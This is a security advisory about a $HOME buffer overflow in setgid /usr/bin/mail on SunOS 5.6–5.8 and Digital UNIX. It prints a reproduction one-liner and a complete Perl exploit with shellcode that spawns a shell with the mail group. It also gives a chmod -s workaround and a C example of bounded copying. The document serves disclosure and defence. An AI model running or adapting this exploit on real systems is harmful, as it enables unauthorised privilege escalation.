COMMAND

    mail

SYSTEMS AFFECTED

    SunOS 5.6, 5.7, 5.8, Digital UNIX

PROBLEM

    The following is based on Georgi Guninski's security advisory #46.
    There is a buffer overflow in SunOS 5.8 x86 involving $HOME and
    /usr/bin/mail, a setgid binary, which leads to egid=mail.  Details:

        HOME=`perl -e 'print "A"x1100'` ; export HOME
        mail a
        CTRL-C

    eip gets smashed with 0x41414141.

    Exploit:

    #!/usr/bin/perl
    # /usr/bin/mail exploit by Georgi Guninski
    use Env qw($HOME);
    #shell code taken from Pablo Sor's mailx exploit
    $shell = "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06";
    $shell .="\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90";
    $shell .="\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0";
    $shell .="\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33";
    $shell .="\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec";
    $shell .="\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89";
    $shell .="\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50";
    $shell .="\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2";
    $shell .="\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4";
    $shell .="\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
    $RET = "\xa0\x6f\x04\x08" ; #may need to change this
    $OVER=1032;
    $ALL=1200;
    $buf=$RET x ($OVER/4) . "\x90" x ($ALL - $OVER - length($shell)) . $shell;
    system("/bin/ln -s /bin/ksh /tmp/xx");
    print "Written by Georgi Guninski, shell code taken from Pablo Sor's mailx exploit.\nPress CTL-C\n";
    $ENV{HOME}=$buf;
    exec "/usr/bin/mail","A";

    Solaris 7/SPARC is vulnerable as well, and so is Digital UNIX V4.0C.

    This was also tested on OpenBSD 2.8/i386 and /sparc, Red Hat Linux
    6.1/alpha and Debian GNU/Linux 2.2r3/i386, and they are not
    vulnerable.

SOLUTION

    Workaround: chmod -s /usr/bin/mail (strip the setgid bit so an
    overflow no longer yields egid=mail).  Sun was informed on 29 May
    2001 about /usr/bin/mail and shall release patches.
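    The underlying defect is an unbounded copy of the attacker-controlled
    $HOME into a fixed stack buffer.  The following is an added
    illustration, not code from the advisory or from Sun's mail, of how a
    setgid program should take such a value: bound the copy to the
    destination size and reject anything that does not fit.  The buffer
    size HOME_MAX and the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size; near the advisory's 1032-byte overflow offset. */
#define HOME_MAX 1024

/* Copy an untrusted environment value into a fixed buffer, refusing
 * anything that would not fit together with its NUL terminator.
 * Returns 0 on success, -1 if the value is missing or too long. */
int bounded_home_copy(const char *home, char *dst, size_t dstlen)
{
    size_t n;
    if (home == NULL || dst == NULL || dstlen == 0)
        return -1;
    n = strnlen(home, dstlen);   /* never scans past dstlen bytes */
    if (n >= dstlen)             /* no room left for the terminator */
        return -1;
    memcpy(dst, home, n + 1);
    return 0;
}

/* Constructs a $HOME of `len` 'A' bytes (the advisory's perl one-liner
 * with len=1100) and reports whether the bounded copy accepts it.
 * Returns 1 if accepted, 0 if rejected, -1 on allocation failure. */
int probe_home_length(size_t len)
{
    char dst[HOME_MAX];
    char *home = malloc(len + 1);
    int rc;
    if (home == NULL)
        return -1;
    memset(home, 'A', len);
    home[len] = '\0';
    rc = bounded_home_copy(home, dst, sizeof dst) == 0 ? 1 : 0;
    free(home);
    return rc;
}

int main(void)
{
    /* What a hardened mail would do with the real environment. */
    char home[HOME_MAX];
    if (bounded_home_copy(getenv("HOME"), home, sizeof home) != 0)
        fprintf(stderr, "HOME missing or too long, refusing to continue\n");
    printf("1100 x 'A' accepted: %d\n", probe_home_length(1100));  /* prints 0 */
    printf("1023 x 'A' accepted: %d\n", probe_home_length(1023));  /* prints 1 */
    return 0;
}
```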